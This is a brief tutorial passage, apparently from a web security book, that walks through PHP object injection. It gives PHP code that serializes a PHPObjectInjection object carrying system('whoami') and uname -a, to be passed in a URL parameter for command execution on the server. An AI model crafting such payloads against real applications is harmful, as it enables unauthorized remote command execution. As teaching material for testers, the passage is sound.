The following steps demonstrate PHP Object Injection:
- Here, we have an app that is passing serialized data in the get parameter:
- Since we have the source code, we will see that the app is using __wakeup() function and the class name is PHPObjectInjection:
- Now we can write a code with the same class name to produce a serialized object containing our own command that we want to execute on the server:
<?php
class PHPObjectInjection{
public $inject = "system('whoami');";
}
$obj = new PHPObjectInjection;
var_dump(serialize($obj));
?>
- We run the code by saving it as a PHP file, and we should have the serialized output:
- We pass this output into the r parameter and we see that here, it shows the user:
- Let's try passing one more command, uname -a. We generate it using the PHP code we created:
- And we paste the output in the URL:
- Now we see the command being executed and the output is as follows:
